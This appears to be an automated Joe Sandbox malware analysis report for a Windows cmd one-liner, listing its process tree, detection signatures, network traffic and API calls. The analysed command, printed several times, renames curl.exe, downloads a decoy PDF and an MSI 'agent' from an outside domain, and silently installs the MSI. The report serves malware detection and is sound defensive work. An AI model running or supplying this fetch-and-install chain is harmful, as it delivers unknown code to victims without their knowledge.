Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:	1528038
Infos:

Detection

Score:	8
Range:	0 - 100
Whitelisted:	false
Confidence:	60%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 4400 cmdline: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7128 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

TNheBOJElq.exe (PID: 1532 cmdline: TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

TNheBOJElq.exe (PID: 6484 cmdline: TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

msiexec.exe (PID: 7096 cmdline: C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 432 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5472, ProcessCommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", ProcessId: 4400, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,	3_2_00103EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash,	3_2_0010F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	3_2_0010F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_0010F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	3_2_0010EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	3_2_00106400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_00106591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	3_2_0010C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010C730 CryptHashData,	3_2_0010C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_0010C750

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: -----BEGIN PUBLIC KEY-----		3_2_000E77F7
Source: TNheBOJElq.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2

Source:

Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_000DDB77 recv,WSAGetLastError,

3_2_000DDB77

Source: global traffic	HTTP traffic detected: GET /download/pdf HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /download/agent HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: /

Source: TNheBOJElq.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic

DNS traffic detected: DNS query: dbs5.pwods.com

Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbs5.pwods.com/download/agent
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dbs5.pwods.com/download/pdf

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000D1535	3_2_000D1535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000FA8D8	3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000CE127	3_2_000CE127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000DA9B3	3_2_000DA9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000EC1FD	3_2_000EC1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0010CAA0	3_2_0010CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000DFAEC	3_2_000DFAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_001133B0	3_2_001133B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000D4415	3_2_000D4415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_000E25B8	3_2_000E25B8

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000DD6AD appears 302 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000C913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000D201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000D20E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000DD632 appears 246 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000D2564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: String function: 000D251E appears 48 times

Source: classification engine

Classification label: clean8.win@11/3@1/2

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

3_2_000C310D

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TNheBOJElq.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior

Source:

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

3_2_000DD33A

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_000DCEEF push edi; retn 000Dh

3_2_000DCEF0

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-42381

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

API coverage: 8.3 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|\|

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0011155B

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

3_2_000DD33A

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00110CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0011155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe	Code function: 3_2_001116BE SetUnhandledExceptionFilter,	3_2_001116BE

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn	Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_0011137A cpuid

3_2_0011137A

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

Code function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00111775

